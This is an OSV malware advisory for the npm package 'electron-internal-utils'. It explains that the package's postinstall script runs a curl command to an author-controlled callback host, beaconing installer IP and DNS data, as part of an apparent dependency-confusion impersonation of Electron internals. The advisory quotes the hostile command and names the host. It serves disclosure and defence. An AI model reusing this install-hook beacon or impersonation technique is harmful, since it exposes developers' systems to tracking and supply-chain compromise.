electron-internal-utils @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-6186
Ecosystem
npm
Summary
On npm install, package.json's postinstall script executes curl http://9ph8dp.ceye.io , an out-of-band DNS/HTTP interaction service controlled by the package author. The callback signals the attacker that the package was installed on the host and leaks the installer's public IP and DNS resolver metadata. The package ships no functionality (index.js contains only module.exports = {}; ) and its name impersonates the Electron project's internal-utilities namespace, consistent with a dependency-confusion attack against projects that reference internal Electron helpers. Any environment that runs npm install on this package will silently beacon to attacker-controlled infrastructure.
Source: amazon-inspector (e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.